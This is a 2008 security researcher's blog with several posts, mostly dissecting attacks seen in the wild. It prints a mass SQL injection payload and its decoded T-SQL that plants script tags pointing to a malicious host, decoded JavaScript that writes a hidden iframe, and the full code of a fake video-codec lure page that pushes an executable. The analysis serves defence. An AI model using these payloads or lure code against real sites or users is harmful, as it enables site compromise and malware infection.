Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 30 September 2008

cr4nk responds - OH NOEZ!

Alas poor skiddie, for thou shall be ridiculed! ..... On Tuesday 28th Sept, I sent the following to our dear cr4nk, as I was in a funny mood (I get like that occasionally) and fancied having a laugh. I never expected a response, but boy am I glad he did (it took a week, but he finally got there lol);

Dear cr4nk,
     I'd like to thank you for playing "how to be an unsuccessful skiddie" and giving me the opportunity to shut down your website (I really did enjoy doing that). Alas it would appear, you've still not learnt however so rest assured, we'll be following you until you stop attacking peoples servers.


One week later, and it seems whilst his spelling leaves alot to be desired, he did actually respond ..... and OH NOEZ! the "leet" skiddie (sorry "genius hacker" LOL!) is telling me to err - shut up?

well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


... and he must be feeling rather bold - he's not even bothered to try and disguise where his e-mail is coming from, lol.

Exported by: Outlook Export v0.1.2


From: cr4nk@land.ru
E-mail:cr4nk@land.ru [ 82.204.219.251 - pochta.ru ]
Date: 01/10/2008 00:47:01
Subject: Re: Woops
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>well we nevert ghet abusedd again. u can abuse our domains and our webspace but we never die. dont forget that. we arent some kiddis we are genius hackers my friends. some bad hackers were got ficked but we never get fucked becuse were are so good boy. so shut up and FUCK YOU<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <cr4nk@land.ru>
Delivered-To: services@[RM]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-124.livemail.co.uk (Postfix) with SMTP id 8621B8A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from web22.pochta.ru (web22.pochta.ru [82.204.219.122])
by smtp-in-124.livemail.co.uk (Postfix) with ESMTP id 706378A5DDC
for <services@[RM]>; Wed, 1 Oct 2008 00:47:02 +0100 (BST)
Received: from [127.0.0.1] (helo=localhost)
by web22.pochta.ru ( sendmail 8.13.3/8.13.1) with esmtp id 1Kkovl-0001E7-RC
for services@[RM]; Wed, 01 Oct 2008 03:47:01 +0400
Message-ID: <20081001034701.dw3sqc7b40g4480g@www.pochta.ru>
Date: Wed, 01 Oct 2008 03:47:01 +0400
From: cr4nk@land.ru
To: Steven <services@[RM]>
Subject: Re: Woops
In-Reply-To: <00e301c920fc$a58cb800$0c00a8c0@THCP>
MIME-Version: 1.0
Content-Type: multipart/alternative;
boundary="=_69eh72h9ns00"
Content-Transfer-Encoding: 7bit
X-Mailer: Free mail service Pochta.ru; WebMail Client; Account:
cr4nk@land.ru
X-Proxy-IP: [84.187.66.163]
X-Originating-IP: [84.187.66.163]
X-Original-To: services@[RM]


Is it just me, or are these young kids getting too big for their boots? First PRMF thanks me for shutting down his site, swears a bit, then invites me to find and shut down the rest, and now this "d00d", with all of his self confessed "genius", can also only come up with a "shut up" and profanity.

I remember when skiddies actually had some cajones ..... But in the meantime, I'm happy to report, myself and some friends have been locating sites that have been "hacked" by cr4nk and his little group of nut jobs and have been getting them either shut down or cleaned (depending on the owner/hosting co).

If you've been a victim of cr4nk, feel free to drop him an e-mail and give him your thoughts - he seems to like it (but don't forget to report the attack to the authorities and/or your hosting company too).

/edit

Rofl, not long after posting this, he followed up with;

basstard u think u can stop us. we will hack the world man. so we are not some script kiddis we are writing our own exploits also shut up and FUCK YOU

AV's throwing virus warnings for the hpHosts blog and forums

This is a quick note for those of you seeing virus warnings for the hpHosts blog and forums. These are false positives, and are caused by the AV's detecting the malicious codes posted (obviously a good thing), but evidently not realising that they're not able to do any harm.

Avast, Avira and the developers of LinkScanner have been contacted. In the meantime, if it will make you feel safer (and indeed I'd recommend doing it anyway), disable scripts when visiting the blog/forums.

/edit

Whilst doing some testing, I've noticed Avira (what I've got) only flags it when the blog is loaded in Trident based shells such as Avant Browser/Internet Explorer (with or without scripts enabled) - it doesn't flag it when loaded in Opera.

Hex injection, they are persistent .......

If you've read this blog at all lately, you'll no doubt have read the previous blog entries I've made concerning this, and hillariously, they're still trying - evidently not realising their attempts aren't going to work.

The latest attempt comes from 201-92-227-227.dsl.telesp.net.br (IP: 201.92.227.227), and is in the same form as previously;

2008-09-30 20:08:16 GET /pest.asp show=8.15.231.;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E706F726D63652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 201.92.227.227 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - 200 0 0


The part we're interested in, as before, is the Hex between CAST( and %20AS%20VARCHAR (%20 is the space character, so this translates to AS VARCHAR). This code translates this time to;

DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://www.pormce.ru/script.js></script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor


This shows us they've got another URL, pormce.ru. If we run this through vURL we see;

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('s.r="";n=q.o.p();d((n!="4-t")&&(n!="4-u")&&(n!="z")&&(n!="y")&&(n!="x")&&(n!="v")&&(n!="m")&&(n!="A-f")&&(n!="g")&&(n!="4")&&(n!="h")&&(n!="i")&&(n!="l")){5 $a=2.8;5 $b=$a.j("7=");d($b!=-1){}k{5 $c=w V();$c.B($c.U()+3*Q*R);2.8="7=S;T="+$c.P();O{2.G("<9 F=E://C.D/6-H/I.6?N M=0 L=0 J=0></9>")}K(e){}}}',58,58,'||document||ZH|var|cgi|cvbest|cookie|iframe||||if||PH|UR|HI|TH|indexOf|else|VI|ID||userLanguage|toUpperCase|navigator|status|window|CN|MO|PA|new|NE|GU|BN|EN|setTime|deryv|ru|http|src|write|bin|index|frameborder|catch|height|width|script|try|toGMTString|3600|1000|update|expires|getTime|Date'.split('|'),0,{}))


Which is the usual obfuscation rubbish we're used to, and it's very easily decoded using Malzilla;

window.status="";n=navigator.userLanguage.toUpperCase();if((n!="ZH-CN")&&(n!=&undefined;ZH-MO")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!=&undefined;UR")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){var $a=document.cookie;var $b=$a.indexOf("cvbest=");if($b!=-1){}else{var $c=new Date();$c.setTime($c.getTime()+3*3600*1000);document.cookie="cvbest=update;expires="+$c.toGMTString();try{document.write("<iframe src=http://deryv.ru/cgi-bin/index.cgi?script width=0 height=0 frameborder=0></iframe>")}catch(e){}}}


This shows us another URL, this time pointing to deryv.ru. This script contains two more scripts that I've not decoded yet, but they're very similar to the previous Asprox injections.

hpHosts - Updated September 30th, 2008

hpHOSTS - UPDATED September 30th, 2008

The hpHOSTS Hosts file has been updated. There is now a total of [b]50,909[/b] listed hostsnames.

If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)

  1. Latest Updated: 30/09/2008 21:30

  2. Last Verified: 30/09/2008 21:00
Download hpHosts now!
http://hosts-file.net/?s=Download

hpHosts - The largest removal to date!

I'm running the final pass validation for the latest release of hpHosts as I write this, and I've noticed something over the last week. When I started the validation process, there was around 4800 or so domains not resolving. Up to this current pass, thats been reduced to just over 4000. However, all of these have thus far, failed to resolve.

This makes it by far, the biggest removal to date for hpHosts. Whether this is directly connected to the Atrivo/Intercage/Est Domains farce is anyone's guess, but I'm betting it's certainly got alot to do with it.

The final pass should be done within the hour, and once those still not resolving are moved from the database, to a monitoring list, I'll begin the prep for the actual release itself - hopefully this should be out by 23:00 (approx 3 hours or so)

/edit

The final number removed is: 4075

Saturday 27 September 2008

PRMF: 0, good guys: 1

Okay, so I don't have a really cool name like The Goddamn Batman, nor do I have a beat stick - but I do take a rather perverse pleasure none the less, in shutting down idiots that are stupid enough to ask on the WOT forums, if their sites rating can be changed to green instead of yellow.

I am of course, talking about PRMF, who in August, wrote (partial quote) in the WOT forums;

I know, this website have SPAM this forum, but the owner don´t know that, and says SORRY in name of all the comunity...
But it´s a safe forum... Why yellow?
Please,check this....


Two problems here, firstly, the person posting this IS the owner of the site in question so either he's talking about himself in the third person, or he thinks those in the WOT forums are stupid ...... sadly further on, we saw it was actually the latter, when after being shown some of the problems with his site, he wrote;

The section XXX is only available to users over 18 per registration, no child has access to the areas , and that comments is to try make my rating up... If they was wrong, i´m sorry and coul delete them? Thanks...

In prmf.realmsn.com/Parceiros-h1.htm its in big red letters that
"O PRMF Fórum não se responsabiliza pelo conteúdo de qualquer site em baixo. São da exclusiva responsabilidade de cada um dos seus autores"
in english:
"The PRMF Forum is not responsible for the content of any site below. They are the sole responsibility of each of its author"

then all those websites are not of my responsibility and I have nothing to do with it and her contents ...

Thanks you!

PRM


In this particular comment, he was referring to the malware I showed him he was linking to, and the XXX section of his site, that was (contrary to his claims), available to kids (more on this further on) - naughty naughty. Further to this, he stupidly admitted that he commented so many times, on his sites scorecard, in order to try and manipulate the sites rating - this isn't going to well so far, and it's about to get worse.

On September 1st, he proudly mentioned his XXX section was gone - and it was, so we focused on the other problem - his sites offering warez. Whilst researching his site a little more, I noticed an increasing issue with the account I was using. Mentioning this on the WOT forums, he claimed my account had not been deleted, but infact, had been put back into verification - then an e-mail from his site proved my original theory of his deleting my account, correct;

Translated version of the e-mail;

"You received this email autopilot because its account at "..::: PRMF Forum :::.." -- hxxp://prmf.realmsn.com has just been excluded.
To know precisely the reasons for exclusion, contact the administrator."

Original;

"Você recebeu este e-mail automatico porque a sua conta em "..::: PRMF Fórum :::.." - hxxp://prmf.realmsn.com acabou de ser excluída.
Para conhecer precisamente os motivos da exclusão, entre em contato com o administrador."


Woops? Way to look legit there - lock out the researcher. Unfortunately for this idiot, he obviously didn't realize that it simply takes a matter of milliseconds to create a new account.

On September 2nd, I decided to check his site again, and was surprised to find he'd re-included the XXX section (obviously he'd not gotten rid of it - just hidden it as all the content was still there). Mentioning this on the forums and further mentioning the fact his site was still offering warez, I was not surprised to note that to date - he's not been back. Evidently realizing that researchers aren't newbie's that can be fooled so easily.

On September 23rd, I decided to revisit the site to see what if anything, had changed. Sadly, it had only changed for the worse. His site was still offering warez, still allowing kids to access the porn section - and now made matters worse as I found a couple of the posts in the XXX section that were quite clearly child pornography.

Warez was bad enough, allowing kids to access porn is bad enough - but to allow your users to post what is blatantly underage porn is unforgivable - and not something I take lightly. I decided enough was enough and reported his site not only to MET (UK Police), but also to CEOP (Child Exploitation and Online Protection Centre) and the IWF (Internet Watch Foundation).

Further to this, I also reported his site to the company that provided his forums, their upstream provider, and their registrars. The reason I did not report this only to the company providing these forums is that in the past when I've done this, it's resulted in nothing being done. By taking a multi-pronge approach, it almost always guarantees someone is going to do something.

Thankfully my approach worked as checking the site again on September 27th, I was presented with the following notice;



Translated;



I didn't get a reply from anyone I reported the site to, and to be honest - I'm not bothered - something was done, that's the main thing.

References

Yellow?
http://www.mywot.com/en/forum/1486-yellow

PRMF.Realmsn.com Scorecard
http://www.mywot.com/en/scorecard/prmf.realmsn.com

Reporting Child Pornography

IWF (Internet Watch Foundation)
http://www.iwf.org.uk/reporting.htm

CEOP (Child Exploitation and Online Protection Centre)
http://www.ceop.gov.uk/ceop_report.aspx

National Center for Missing & Exploited Children
https://secure.missingkids.com/missingkids/servlet/CybertipServlet?LanguageCountry=en_US

International Agencies
http://vachss.com/help_text/report_child_porn_intl.html

Friday 26 September 2008

Full Circle Magazine: Issue 17 is here!

I've been an avid reader of this since coming across is several releases ago, and am happy to say that the latest release is now available.

What is Full Circle Magazine?

Full Circle is a free, independent, magazine dedicated to the Ubuntu family of Linux operating systems.

Description courtesy of the FCM website, whilst mostly true, alot of the stuff in their magazines are actually applicable to other Linux distro's too :o), and whilst not mentioned, their magazines are provided in downloadable PDF

Whats in the latest release?
  1. Command and Conquer - Nano & Vim.
  2. How-To : Program in C - Part 1, Connect to IRC, Using GIMP - Part 6 and Scan & Convert to PDF.
  3. My Story - …When I Was Two
  4. My Opinion - Is This The Year?
  5. MOTU Interview - Harald Sitter
  6. Top 5 - Email Notifiers
Great!, where can I download it?

You can download the latest release at;

http://fullcirclemagazine.org/issue-17/

... and previous releases from;

http://fullcirclemagazine.org/downloads/

RSS Feed:
http://fullcirclemagazine.org/feed/

Bits from Bill: Vote2008 WinPatrol Discount Coupon

Like Bill, I'm no expert on politics either, but personally - I'd give every UK votizen the same discount just to vote out Labour if it had been me ......

Anywho, for those of you that don't have Winpatrol Plus yet (why not??????), Bill is offering a $10 discount (I'm not up on exchange rates, but I believe it's around £20) to those that purchase WinPatrol Plus until as Bill puts it;

.... a reasonable agreement is reached to prevent additional collapse in the financial market


I've absolutely no idea what that means or refers to as I don't follow UK politics let alone US politics, but I'm guessing that means something bad is happening?

Read Bills full post on this subject at;

Bits from Bill: Vote2008 WinPatrol Discount Coupon

If for some unknown reason (and it has to be unknown as I can't think of a single reason not to have it!) you don't actually have WinPatrol yet - GET IT!. You can download it for free (tis the non-PLUS version) from;

www.winpatrol.com

Amazing books! (HIDDENEXT/Worm.Gen and Troj/Agent-HTC)

There's two problems with these e-mails ..... firstly, I did not write a book, and secondly, even if I had, they're under the mis-conception that I can actually write good books LOL!

Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff. It's certainly this year's best in its genre. You seem to never going to quit surprising us. We have made a contract with you and guarantee that the first edition will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


The attachment (31K) is named approved.zip and contains a file named "approved.doc[MANY_SPACES].exe" and detection for it is rubbish;

http://www.virustotal.com/analisis/c4b44222d1d498c795f220989921693a


The e-mail in all of it's glory;

Subjects thus far:

Amazing Book
Excellent Book

Exported by: Outlook Export v0.1.2


From: Susana Hurley
E-mail:unwhchm@bostoncf.com [ - Invalid IP was passed to me ]
Date: 26/09/2008 16:18:01
Subject: Amazing Book
**************************************************************************
Links
**************************************************************************


**************************************************************************
Text Version
**************************************************************************
Greating and felications Friend,

Your new book has brought a lot of excitement to our editorial staff.
It's certainly this year's best in its genre. You seem to never going to
quit surprising us.
We have made a contract with you and guarantee that the first edition
will total at least 10 million copies.

Enclosed is the approved and edited copy of your amazing book. Thank
you for this paragon of beauty.

Please get in touch with us at your earliest convenience.

Adios


**************************************************************************
HTML Version
**************************************************************************
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META NAME="Generator" CONTENT="MS Exchange Server version 6.5.7036.0">
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Converted from text/plain format -->

<P><FONT SIZE=2>Greating and felications Friend,<BR>
<BR>
Your new book has brought a lot of excitement to our editorial staff.<BR>
It's certainly this year's best in its genre. You seem to never going to<BR>
quit surprising us.<BR>
We have made a contract with you and guarantee that the first edition<BR>
will total at least 10 million copies.<BR>
<BR>
Enclosed is the approved and edited copy of your amazing book. Thank<BR>
you for this paragon of beauty.<BR>
<BR>
Please get in touch with us at your earliest convenience.<BR>
<BR>
Adios<BR>
</FONT>
</P>

</BODY>
</HTML>

**************************************************************************
Headers
**************************************************************************
Return-Path: <unwhchm@bostoncf.com>
Delivered-To: services@[RMD]
Received: from Postfix filter 42a77884ce2a0a03efc6bb50a6dcdb21 (localhost.localdomain [127.0.0.1])
by smtp-in-72.livemail.co.uk (Postfix) with SMTP id 4FBE466E6E3
for <services@[RMD]>; Fri, 26 Sep 2008 16:18:03 +0100 (BST)
Received: from [163.153.27.216] (unknown [163.153.27.216])
by smtp-in-72.livemail.co.uk (Postfix) with ESMTP id E685566E6D4
for <burnservices@[RMD]>; Fri, 26 Sep 2008 16:18:01 +0100 (BST)
Received: from [163.153.27.216] by mail.global.frontbridge.com; Fri, 26 Sep 2008 10:18:01 -0500
Date: Fri, 26 Sep 2008 10:18:01 -0500
From: "Susana Hurley" <unwhchm@bostoncf.com>
X-Mailer: The Bat! (v3.71.01) Professional
Reply-To: unwhchm@bostoncf.com
X-Priority: 3 (Normal)
Message-ID: <787369064.27570604130467@bostoncf.com>
To: burnservices@[RMD]
Subject: Amazing Book
MIME-Version: 1.0
Content-Type: multipart/mixed;
boundary="----------8401675F8425842C"
X-Original-To: burnservices@[RMD]

Royal Navy won't fight pirates 'in case they claim asylum'

Normally this wouldn't catch my attention, I couldn't care less about our armed forces - they've been a joke for a very long time (not their fault, it's those in charge we've got to blame), but this is just pathetic.

British Foreign Office officials are understood to have advised the Royal Navy not to confront or arrest pirates in the region for fear of transgressing human rights legislation or encouraging their seeking asylum once taken to the UK.


http://www.theregister.co.uk/2008/09/25/royal_navy_pirate_asylum_seekers/

My brothers in the Navy - think I'll see if I can get hold of him and ask about this. Personally, I think the Navy should tell those in charge to shove it, and blow the pirates out of the water - they couldn't care less about human rights, why should the Navy care about theirs?

In the meantime, the comments by Nick pretty much sum up my thoughts;

They used to say that a an Englishman could safely walk across the breadth of the British empire unprotected because no one dared provoke the armed forces. Maybe I should practice my French instead...

Kentucky (secretly) commandeers world's most popular gambling sites

I tend to agree with alot of the commenters to the article, that this has far reaching implications, and Kentucky shouldn't have been allowed to do this. However, I've also got a more important question - why didn't they go after the sites that actually infect people? That would've been a much better idea.

The state of Kentucky has seized control of some of the world's most popular gambling domain names courtesy of a state judge who issued a secret ruling last week ordering registrars to transfer 141 internet addresses to the state's top law enforcement official.

The order (PDF) by Franklin County Circuit Judge Thomas Wingate applies to sites including absolutepoker.com, goldenpalace.com, and ultimatebet.com. The websites, many of which are operated outside US borders, stand accused of illegally making their services available to Kentucky citizens. Already, whois records list goldencasino.com as the rightful property of J. Michael Brown, the Justice and Public Safety secretary who filed the lawsuit. At time of writing, goldencasino.com and the handful of other affected websites we checked appeared to be offering unfettered online gambling services.


Read the full article at El Reg;

http://www.theregister.co.uk/2008/09/26/gambling_domain_seizure/

Wednesday 24 September 2008

Mylot.com codec infection madness!

Public profiles are a great way to tell people about yourself, just look at the hundreds of sites that offer such a feature. These features however, can be just as bad for the visitor. Take the following for example;



This profile, contains a lovely little link that takes you to;

http://superelectionpolls.info/Teens_Video.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/Teens_Video.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 1
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:08:48
*****************************************************************
<head>
<title> HOT VIDEO SENASTION ONLY HERE!!!</title>
<meta http-equiv="Content-Language" content="en-us" >
<meta name="robots" content="index, follow" >
<META NAME="Keywords" CONTENT="full on bush,george bush on obama"/>
<meta name="description" content="full on bush, nunn bush penny loafer, zshare jennifer bush, full on bush, bush ak20 television user manual, bush iraq troop reduction/">
<meta name="revisit-after" content="2 days">
<meta name="rating" content="general">
</head>
<p><IFRAME src="test.html" width="1200" height="1000"
scrolling="auto" frameborder="1">
</IFRAME>
</p>
<br>


As you can see, this loads an iFrame that then loads;

http://superelectionpolls.info/test.html

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://superelectionpolls.info/test.html
Server IP: 206.53.51.84 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 1
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:48:47:48
*****************************************************************
<html>
<head>
<title>
fastguidan.info
</title>
</head>
<BODY bgcolor="FFFFCC">
<script type="text/javascript" language="javascript">
eval(unescape("myvar1%3D5462%3B%0D%0Amyvar4%3Dmyvar1%3B%0D%0Aif%28myvar1%3D%3Dmyvar4%29%20document%2Elocation%3D%22http%3A%2F%2Falldebt%2Ebiz%2Fnewway%2Fin%2Ecgi%3F5%22%3B%0D%0A"));
</script>

</body>

</html>


This then loads the following little script;

eval(unescape("myvar1=5462;
myvar4=myvar1;
if(myvar1==myvar4) document.location="http://alldebt.biz/newway/in.cgi?5";
"));


Which as you can see, takes you to;

http://alldebt.biz/newway/in.cgi?5

.... which is where the fun begins. alldebt.biz, uses a 302 redirect;

HTTP/1.1 302 Found
Date: Wed, 24 Sep 2008 22:27:29 GMT
Server: Apache/1.3.36 (Unix) mod_fastcgi/2.4.2 PHP/5.1.4 FrontPage/5.0.2.2510
Set-Cookie: SL_5_0000=_5_; domain=alldebt.biz; path=/; expires=Thu, 25-Sep-2008 22:27:29 GMT
Location: http://theprivatetube.com/1/0/0/693/0/white/
Transfer-Encoding: chunked
Content-Type: text/html


Which as you can see, takes us to theprivatetube.com, which loads;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://alldebt.biz/newway/in.cgi?5
Server IP: 72.232.180.163 [ 163.180.232.72.static.reverse.ltdomains.com ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 5
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 03:49:38:49
*****************************************************************
<html>
<head>
<title>Free movies online</title>
<style>
#alertMessage {
background: #000000 url(/error.png) no-repeat scroll 0pt;
height: 129px;
visibility: hidden;
width: 384px;
z-index: 2;
position: absolute;
}

body {
background-color: white;
font-family:Tahoma;
align:center;
}
</style>
<script>

function simpleRedirect()
{
document.getElementById("alertMessage").style.visibility = "hidden";
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function openCodec()
{
document.body.onbeforeunload="";
document.location = "/cd/693/0/wmcodec_update.exe";
document.body.onbeforeunload="askInstall();return false";
}

function alertInstall()
{
alert("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library.");
openCodec();
}

function askInstall()
{
if (confirm("Windows Media Player Error\n"+"Please, click 'OK' for Upgrade Windows Media Player Codec Library."))
simpleRedirect();
else
alertInstall();
}

function hideAlert()
{
document.getElementById("alertMessage").style.visibility="hidden";
simpleRedirect();
}

function docLoad()
{
document.body.onbeforeunload="askInstall();return false";
}
</script>
<script src="/dnd.js"></script>
</head>
<body>
<div style="font:17px Tahoma;color:black;" align="center">

</div>
<div id="alertMessage" onmousedown="this.style.zIndex=10;StartDrag(event,this,PutBack)" name="errorMsg">
<div id="alertTitle"
style="position: relative; top: -14px; left: 360px; width: 20px; height: 20px; font-size: 14px; color: white; font-weight: bold; border: none"
onclick="hideAlert();">
<div style="display: none"> </div>
</div>
<div id="alertText"
style="position: relative; top: 20px; left: 60px; width: 300; font-size: 12px; font-name: Arial">
Windows Media Player cannot play the file. The Player does not support the format you are trying to play. Please install video codec update.</div>
<div id="alertButtons"
style="position: relative; top: 30px; left: 100px" /><input
type="button" onclick="simpleRedirect()"
value="  Ok  " /> <input type="button"
onclick="simpleRedirect();" value="  Cancel  " />
<input type="button" onclick="simpleRedirect()"
value="  Continue  " /></div>
</div>

<table width="100%" align="center" valign="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" valign="center"><img src="/img/prev_1_0.png"
onclick="simpleRedirect();" style="border: 1px solid white" /></td>
</tr>
</table>
<script>
<!--
setTimeout("showAlert();", 1000);

function showAlert()
{
var p=document.getElementById("alertMessage");
wmpwidth=document.body.clientWidth/2-190;
wmpheight=document.body.clientHeight/2-145;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
-->

</script>
</body>
</html>


This then loads a 187K executable;

http://theprivatetube.com/cd/693/0/wmcodec_update.exe

Which Avira kindly flagged for me .........



VT results for wmcodec_update.exe;

http://www.virustotal.com/analisis/fb970f590465d2da92b161aac1706893

Extraction of the executable failed whilst named .exe, so I tried renaming it to .zip (Universal Extractor identified it as a 7-zip file), and voila - I could extract it. The following is it's contents;


*****************************************************
Ur I.T. Mate Group Intranet
http://mysteryfcm.co.uk

This file has been generated by QFScript v1.0 Revision 3
Author: Steven Burn - Ur I.T. Mate Group owner
Homepage: www.it-mate.co.uk

File index for: mylot_com\alldebt_biz_-_theprivatetube_com
*****************************************************
DATE/TIME - MD5 - FILE/FOLDER
25/09/2008 04:03:30     d96fa963dbabb94bb60fc38ded67cc7f     alldebt_biz_-_theprivatetube_com
25/09/2008 04:04:20     21a7031dde9bdb27f07f5fcfa58bd905     alldebt_biz_-_theprivatetube_com\wmcodec_update.exe
25/09/2008 04:14:06     89f3c6308bce5f634dfc374499b3a1a9     alldebt_biz_-_theprivatetube_com\wmcodec_update
25/09/2008 04:14:10     825f37247eaef9006448dc5d0265aa29     alldebt_biz_-_theprivatetube_com\wmcodec_update\$R0
25/09/2008 04:16:16     4119d31ea7da45cf0d9a6f9961918038     alldebt_biz_-_theprivatetube_com\wmcodec_update\script.bin
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ýŠ€
25/09/2008 04:16:20     307f3492345535f4d6d5ce2637c8341b     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir
25/09/2008 04:16:20     8cfcf8ed20ed00fd6f80eabc6a8b321a     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\ýŠ€
25/09/2008 04:16:20     5680520d33b4175681abf3138a5ecfd6     alldebt_biz_-_theprivatetube_com\wmcodec_update\ProgramFilesDir\sx2_77000560.exe
25/09/2008 04:16:20     173ffeaf2e189bc76e476b255559b41a     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR
25/09/2008 04:16:20     8183cd31665faaf5a7d7f5fa4d54e57b     alldebt_biz_-_theprivatetube_com\wmcodec_update\$PLUGINSDIR\System.dll
*****************************************************
3 folders, 7 files
*****************************************************


Sadly, detection for sx2_77000560.exe is rather pitiful, with only 2/36 actually detecting it;

http://www.virustotal.com/analisis/4df5fd8178baf3f313854d2839309eb5

The ýŠ€ and $R0 are all 0 byte files ........ Sadly, Universal Extractor, whilst again, identifying sx2_77000560.exe as a 7-zip file, could not actually extract it.

Looking through the wmcodec_update.exe executable shows some interesting content too. For example, it contains the following URL references;

http://meta38.com/service/index.php
http://linker15.cn/service/index.php



Both URL's return the same content;

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://meta38.com/service/index.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:29:43:29
*****************************************************************
<root>
<serviceurls>
<serviceurl>http://meta38.com/service/index.php</serviceurl>
<serviceurl>http://linker15.cn/service/index.php</serviceurl>
</serviceurls>
<feedurls>
<feedurl>http://bestsearch3.com/feed/get.php</feedurl>
<feedurl>http://bestsearch4.com/feed/get.php</feedurl>
</feedurls>
</root>


bestsearch3.com and bestsearch4.com, both failed to return anything useful.

*****************************************************************
vURL Desktop Edition v0.3.5 Results
Source code for: http://bestsearch3.com/feed/get.php
Server IP: 200.63.45.51 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Scripts: 0
iFrames: 0
via Proxy: TeMerc Internet Countermeasures (US)
Date: 25 September 2008
Time: 04:33:04:33
*****************************************************************
<?xml version="1.0" encoding="UTF-8" ?>
<result>
</result>

Your Pay Pal Account May Be Compromised

